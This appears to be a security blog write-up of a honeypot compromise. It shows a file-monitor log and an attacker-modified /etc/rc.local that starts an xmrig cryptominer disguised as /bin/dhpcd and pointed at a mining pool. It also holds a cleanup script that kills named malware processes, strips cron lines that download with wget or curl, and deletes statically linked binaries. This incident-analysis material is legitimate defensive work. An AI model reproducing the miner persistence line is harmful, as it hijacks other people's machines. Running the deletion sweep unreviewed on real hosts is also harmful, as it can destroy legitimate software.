INFO:root:MODIFY event : /var/spool/cron/crontabs/tmp.5gdVYA  2019-03-20 15:14:49.217717
INFO:root:MODIFY event : /dev/null  2019-03-20 15:14:50.245119
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:53.816718
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:53.972817
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.138558
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.303399
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.457962
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.625196
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.784003
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:54.949894
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.113563
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.273291
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.468209
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.611614
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.782594
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:55.947091
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.086717
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.267656
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.444056
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.619012
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.777156
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:56.921299
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.114877
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.267230
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.420870
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.588299
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.770619
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:57.933107
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.073582
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.258056
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.423030
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.599916
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.765426
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:58.914629
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.080883
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.242431
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.419305
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.584976
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.722322
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:14:59.911820
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.603662
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.747130
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.862070
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.888740
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:00.965000
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.152583
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.340117
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.464616
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.727373
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:01.882114
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.021524
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.231538
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:02.577823
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.012116
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.425070
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:03.815753
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.202723
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.674746
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:04.956017
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:05.388042
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:05.752932
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.136062
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.535232
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:06.918982
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:07.376316
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:07.713961
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.104982
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.473439
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:08.886292
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:09.239495
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:09.646030
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.044261
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.384033
INFO:root:MODIFY event : /bin/dhpcd  2019-03-20 15:15:10.469870
INFO:root:MODIFY event : /etc/rc.local  2019-03-20 15:15:38.510660
INFO:root:MODIFY event : /run/sshd.pid  2019-03-20 15:15:44.673229
INFO:root:MODIFY event : /run/sshd.pid  2019-03-20 15:15:44.673907
# cat /etc/rc.local
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

# NOTE(review): the stock header above says this file "does nothing" by
# default, so the command below is presumably the attacker-added boot
# persistence (the capture's monitor log records a MODIFY event on
# /etc/rc.local).
# It starts /bin/dhpcd, which prints an xmrig usage banner when run with -h:
#   -o ca.minexmr.com:4444   URL of the mining server
#   -t1                      one miner thread
#   --safe                   adjust threads/av settings for the current CPU
#   -B                       run in the background
# stdout and stderr are both sent to /dev/null, so nothing reaches the boot
# log. No -u/--user value is passed here; where the pool credentials come
# from is not visible in this file -- TODO confirm from the binary or a config.
# Detection hints: alert on writes to /etc/rc.local and on outbound
# connections to the pool host and port named on the command line.
/bin/dhpcd -o ca.minexmr.com:4444 -t1 --safe -B >/dev/null 2>/dev/null
exit 0
root@92ae08a47348:/opt# ./dhpcd -h
Usage: xmrig [OPTIONS]
Options:
  -a, --algo=ALGO          specify the algorithm to use
                             cryptonight
  -o, --url=URL            URL of mining server
  -O, --userpass=U:P       username:password pair for mining server
  -u, --user=USERNAME      username for mining server
  -p, --pass=PASSWORD      password for mining server
      --rig-id=ID          rig identifier for pool-side statistics (needs pool support)
  -t, --threads=N          number of miner threads
  -v, --av=N               algorithm variation, 0 auto select
  -k, --keepalive          send keepalived packet for prevent timeout (needs pool support)
      --nicehash           enable nicehash.com support
      --tls                enable SSL/TLS support (needs pool support)
      --tls-fingerprint=F  pool TLS certificate fingerprint, if set enable strict certificate pinning
  -r, --retries=N          number of times to retry before switch to backup server (default: 5)
  -R, --retry-pause=N      time to pause between retries (default: 5)
      --cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
      --cpu-priority       set process priority (0 idle, 2 normal to 5 highest)
      --no-huge-pages      disable huge pages support
      --no-color           disable colored output
      --variant            algorithm PoW variant
      --donate-level=N     donate level, default 5% (5 minutes in 100 minutes)
      --user-agent         set custom user-agent string for pool
  -B, --background         run the miner in the background
  -c, --config=FILE        load a JSON-format configuration file
  -l, --log-file=FILE      log all output to a file
  -S, --syslog             use system log for output messages
      --max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)
      --safe               safe adjust threads and av settings for current CPU
      --asm=ASM            ASM code for cn/2, possible values: auto, none, intel, ryzen, bulldozer.
      --print-time=N       print hashrate report every N seconds
      --api-port=N         port for the miner API
      --api-access-token=T access token for API
      --api-worker-id=ID   custom worker-id for API
      --api-id=ID          custom instance ID for API
      --api-ipv6           enable IPv6 support for API
      --api-no-restricted  enable full remote access (only if API token set)
      --dry-run            test configuration and exit
  -h, --help               display this help and exit
  -V, --version            output version information and exit

2019-03-22

#!/bin/bash

# Environment setup for the captured script: fixed locale, a fixed command
# search path, and a scratch file that collects commands to run at the end.

# Presumably set so that tool output grepped later (e.g. the strings printed
# by `file`) does not vary with the host locale.
export LC_ALL=C
# The caller's PATH is saved because the static-binary sweep further down
# walks its directories via ${oldPATH//:/ }.
oldPATH="$PATH"
# From here on, commands are resolved only from the standard system directories.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# Scratch file: package-reinstall commands are appended to it inside the sweep
# loop and the file is sourced (". $post_run_file") at the end of the script.
post_run_file=`mktemp`
# NOTE(review): when mktemp returns nothing, the fallback is a PID-based name
# under /tmp. That name is predictable, and the file is later appended to and
# sourced by this same shell, so a file or symlink already present at that path
# would have its contents executed. Anyone reusing this script should abort
# when mktemp fails rather than fall back.
test "$post_run_file" || post_run_file=/tmp/tmp.post_run_file.$$

# Removal of a hard-coded list of persistence entries, files and directories.
# Two of the paths (/etc/cron.hourly/gcc.sh and /lib/libudev.so) also appear in
# the honeypot CREATE events logged on 2019-03-19 earlier on this page.

# Delete /etc/crontab lines that reference /etc/cron.hourly/gcc.sh or
# /etc/cron.hourly/cron.sh (edited in place, no backup copy is kept).
sed -i '/\/etc\/cron\.hourly\/\(gcc\|cron\)\.sh/d' /etc/crontab
# Delete individual files by fixed path; /tmp/ddgs.* is a glob expanded by the shell.
rm -f /etc/cron.hourly/gcc.sh /etc/cron.hourly/gcc4.sh /lib/libudev.so /root/pty /tmp/bash /dev/shm/bash /var/tmp/bash /var/lock/bash /var/run/bash /bin/httpsd /lib/udev/udev /lib/udev/debug /root/sysem /root/systma /etc/jourxlv /tmp/sysem /tmp/su /tmp/ddgs.*
# Delete directories recursively. Several names consist of dots and spaces
# ('/var/tmp/ ', '/var/tmp/...', '/var/tmp/.     '), which are easy to overlook
# in a plain `ls` listing; /tmp/.X12-unix resembles the usual /tmp/.X11-unix.
rm -rf /tmp/.xm /root/.system /tmp/.iokb21 /var/tmp/... /tmp/.tmp /usr/cpu/bin '/var/tmp/ ' /tmp/.X12-unix /var/tmp/."     " /tmp/.mountfs /tmp/seconfig /root/.ttp
# Clear the immutable attribute on root's crontab spool files (both the
# /var/spool/cron and /var/spool/cron/crontabs layouts) and on /etc/ceurnad.
# The crontab itself is rewritten later through `crontab -`.
chattr -i /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ceurnad
# Clear immutable (-i) and append-only (-a) so the rm on the next line can succeed.
chattr -i -a /usr/local/sbin/t /usr/local/sbin/rsync
# NOTE(review): /usr/local/sbin/rsync is removed unconditionally; on a host with
# a locally installed rsync at that path this deletes a legitimate binary.
rm -f /usr/local/sbin/t /usr/local/sbin/rsync /etc/ceurnad

# Kill processes by hard-coded name or command line, using SIGKILL throughout.
# Without -f, pkill matches the process name; with -f it matches the full
# command line. In both cases the pattern is a regular expression, so the '.'
# in '.xmrig' and './systma' matches any character.
# NOTE(review): matching is by name only. A process started under a different
# name is not affected, and any unrelated process whose command line contains
# one of the -f patterns (for example a path beginning with /tmp/su) is killed.
# Treat the list as indicators to search for, not as proof of a clean host.
pkill -9 -f 'python /bin/httpsd' # order of args matters on some systems
pkill -9 xm32
pkill -9 xm64
pkill -9 ceurnad
pkill -9 .xmrig
pkill -9 -f /tmp/.xs/daemon.i686.mod
pkill -9 -f ./systma
pkill -9 -f /root/.local/syslogd
pkill -9 -f /tmp/samba
pkill -9 xorgg
pkill -9 sc64u
pkill -9 -f /tmp/su

# Heuristic cleanup of cron persistence.
# Step 1: inside /etc/cron.hourly, delete every script that contains a line
# copying a binary named after the script itself (file name minus ".sh") within
# /bin or /usr/bin, i.e. text of the form  cp "/bin/NAME" "/bin/...  or
# cp "/usr/bin/NAME" "/usr/bin/... . grep has no -q, so matching lines are also
# printed to stdout.
# NOTE(review): ${f%.sh} is unquoted and used as part of a regular expression,
# so file names containing spaces or regex metacharacters are not matched as
# written. If the directory is empty the glob stays a literal '*' and grep only
# reports a missing file.
if cd /etc/cron.hourly ; then
    for f in *;do
        grep -e 'cp "/bin/'${f%.sh}'" "/bin/' -e 'cp "/usr/bin/'${f%.sh}'" "/usr/bin/' "$f" && rm -f "$f"
    done
fi
# Step 2: rewrite the invoking user's crontab, dropping every line that matches
# 'wget .*sh', 'curl .*sh' or '/pty .*/dev/null'.
# NOTE(review): the filters are broad substrings; a legitimate job that calls
# wget or curl and has "sh" later on the line is removed as well, and nothing is
# saved beforehand. Capture `crontab -l` output before running this on a host
# whose crontab matters.
crontab -l | grep -v 'wget .*sh' | grep -v 'curl .*sh' | grep -v '/pty .*/dev/null' | crontab -

# Sweep for statically linked executables and delete them.
# Runs only when the `file` utility is found (`which` also prints its path).
if which file ; then
    # Pipeline, stage by stage:
    #   1. find lists everything under each directory of the ORIGINAL PATH
    #      (oldPATH, with ':' turned into spaces).
    #   2. `xargs file` classifies each entry; only lines containing
    #      'statically linked' are kept, and cut keeps the text before the
    #      first ':' as the path.
    #   3. First grep -v: regex allow-list of path fragments to leave alone.
    #   4. Second grep -v -F: fixed-string allow-list of specific paths.
    #   5. Every remaining path has its immutable attribute cleared and is
    #      deleted with rm -f.
    # NOTE(review): this is a destructive heuristic. Any statically linked
    # binary that is not covered by the two allow-lists is removed without
    # confirmation (the interactive `rm -vi` variant below is commented out),
    # which on a normal host can include legitimate statically built tools.
    # For triage, prefer printing the candidate list and reviewing it.
    # NOTE(review): many allow-list patterns are short unanchored fragments
    # ('agent', 'server', 'monitor', 'track', 'print', 'replace', ...), so the
    # sweep skips every path containing them and cannot be taken as complete.
    # NOTE(review): `find | xargs file`, `cut -d: -f1` and `read ff` (no -r)
    # mishandle paths containing whitespace, ':' or backslashes; such paths are
    # split or truncated before they reach chattr/rm.
    #find ${PATH//:/ } | while read f; do file "$f";done | grep \
    find ${oldPATH//:/ } | xargs file | grep \
        'statically linked' | cut -d: -f1 | grep -v -e '/mbchk$' \
        -e 'dump' -e 'kube' -e ngrok -e iscsistart -e '_ctl$' -e fsck -e '/minidlnad$' \
        -e docker -e xenstore -e wine -e nsenter -e importenv -e aide -e shadowsocks \
        -e mount -e 'bin/bcm\.user' -e partclone -e drbl-chntpw -e '/crictl$' \
        -e '/helm$' -e etcdctl -e '/e3$' -e raid -e agent -e 'print' -e '/isamchk$' \
        -e '/mysql' -e '/mdadm$' -e '/jq$' -e '/usr/sbin/redhat_lsb_trigger\.' \
        -e '/pfmon' -e '/pfdbg' -e '/packer$' -e '/dns-rebind$' -e '/sz$' -e '/retpan$' \
        -e '/gshelld$' -e 'helper$' -e '\.backup$' -e '/ffmpeg$' -e '/rar$' \
        -e '/unhide' -e '/rebind$' -e '/v2ctl$' -e '/unace$' -e '/resume$' \
        -e '/tw_cli$' -e '/MegaCli$' -e '/lsiutil$' -e '/start$' -e '/fbi$' \
        -e 'cobol$' -e '/pack_isam$' -e '/myisa' -e '/isamlog$' -e '/perror$' \
        -e 'track' -e 'monitor' -e geckodriver -e '/koolshare' -e '/wipefs$' \
        -e wrapper -e replace -e resolveip -e server -e '/ethos-id$' \
        -e '/gofmt$' \
        -e '/v2ray$' -e '/gitlab-runner$' -e '/hdsfusemnt$' -e '/qtvagent$' \
        -e '/xvbeat$' \
        -e '/grub$' -e '\.static$' -e '\.old$' | grep -v -F \
        -e '/usr/bin/valgrind' \
        -e '/usr/sbin/tzdata-update' \
        -e '/sbin/busybox' \
        -e '/sbin/cryptsetup' \
        -e '/sbin/dump' \
        -e '/sbin/e2fsck' \
        -e '/sbin/fsck.ext2' \
        -e '/sbin/fsck.ext3' \
        -e '/sbin/ldconfig' \
        -e '/sbin/mpath_ctl' \
        -e '/sbin/nash' \
        -e '/sbin/restore' \
        -e '/sbin/rmt' \
        -e '/sbin/sln' \
        -e '/bin/sln' \
        -e '/usr/sbin/build-locale-archive' \
        -e '/usr/sbin/glibc_post_upgrade.i686' \
        -e '/usr/sbin/glibc_post_upgrade.x86_64' \
        -e '/usr/sbin/libgcc_post_upgrade' \
        -e '/usr/sbin/prelink' \
        -e '/usr/sbin/plesk' \
        -e '/usr/bin/wine64-preloader' \
        -e '/usr/bin/wine-preloader' \
        -e '/bin/busybox' \
        -e '/bin/dhpcd' \
        -e '/mpath_prio_' \
        -e '/usr/sbin/sas2ircu' \
        -e '/usr/bin/rar' \
        -e '/usr/bin/rlpdump' \
        -e '/usr/bin/oracle' \
        -e '/sbin/init' \
        -e /usr/bin/netserve  \
        -e /sbin/auibusy \
        -e '/sbin/auplink' \
        -e /sbin/aumvdown \
        -e '/usr/local/bin/sas2ircu' \
        -e '/usr/local/bin/sas3ircu' \
        -e '/usr/sbin/glibc_post_upgrade' \
        -e '/sbin/discover' \
        -e '/usr/bin/jad' | while read ff;do
    # Clear the immutable attribute first; rm -f would otherwise fail on it.
    chattr -i "$ff"
#    rm -vi "$ff"</dev/tty
    rm -f "$ff"
    # When the deleted file was named ps, ss, lsof or netstat, queue a package
    # reinstall (yum first, apt-get as the last alternative) in the post-run
    # file. Presumably a statically linked copy of one of these tools is taken
    # to be a tampered replacement for the distribution binary -- not stated
    # in the script itself. Each grep also prints the matching path to stdout.
    if echo "$ff" | grep '/ps$' ; then
        echo 'yum -y install procps || yum -y reinstall procps || apt-get install --reinstall procps' >>$post_run_file
    fi
    if echo "$ff" | grep '/ss$' ; then
        echo 'yum -y install iproute || yum -y reinstall iproute || apt-get install --reinstall iproute' >>$post_run_file
    fi
    if echo "$ff" | grep '/lsof$' ; then
        echo 'yum -y install lsof || yum -y reinstall lsof || apt-get install --reinstall lsof' >>$post_run_file
    fi
    if echo "$ff" | grep '/netstat$' ; then
        echo 'yum -y install net-tools || yum -y reinstall net-tools || apt-get install --reinstall net-tools' >>$post_run_file
    fi
done
fi

# Read-only checks on running processes; nothing is killed or deleted here.
echo More checks:
# List the /proc/<pid>/exe links whose listing contains /tmp, /dev, /var, './'
# or /usb_bus. Errors for processes that cannot be read are discarded.
# NOTE(review): '/var' and '/dev' also match ordinary software installed under
# those trees, so hits need manual review. A process whose binary was removed
# from disk appears in this listing with a ' (deleted)' suffix on the target.
ls -l /proc/*/exe 2>/dev/null | grep -e /tmp -e /dev -e /var -e '\./' -e /usb_bus

# For every process, run `file` on the resolved executable and print the
# /proc/<pid>/exe path when the binary is statically linked or when `file`
# reports 'too many section header sections' (presumably a sign of a malformed
# or deliberately altered ELF header -- confirm against the sample).
# NOTE(review): $l is unquoted, and a resolved path that no longer exists makes
# `file` report an error instead of a match, so deleted-on-disk executables are
# only visible in the ls output above.
if which file ; then
    for l in /proc/*/exe;do file "`readlink -f $l`" | grep -e 'statically linked' -e 'too many section header sections' && echo $l;done
fi


# Print a state snapshot for manual review after the cleanup steps: the busiest
# processes and every scheduled-job location the script touched or may have
# missed. All commands in this section only read.

# First 20 lines of one batch-mode iteration of top.
echo 'top -bn1 | head -n 20:'
top -bn1 | head -n 20

# Pending at(1) jobs.
echo atq:
atq

# Crontab of the invoking user, as left by the earlier filter.
echo 'crontab -l:'
crontab -l

# System crontab, as left by the earlier sed edit.
echo /etc/crontab:
cat /etc/crontab

# Remaining hourly cron scripts, including dot-files.
echo /etc/cron.hourly:
ls -la /etc/cron.hourly

# Drop-in cron files; this directory is listed but not cleaned by the script.
echo /etc/cron.d:
ls -la /etc/cron.d

# Run the queued package-reinstall commands, then remove the scratch file.
# set -x traces each command as it executes.
set -x
# The file is sourced, so every line in it runs in this shell with this shell's
# privileges.
# NOTE(review): $post_run_file is unquoted, and when the predictable /tmp
# fallback name was used its contents are not guaranteed to come only from this
# script. The queued apt-get commands carry no -y, so on apt-based systems this
# step may wait for confirmation.
. $post_run_file
rm $post_run_file

来源:freebuf.com 2019-03-23 18:36:50 by: 陌度
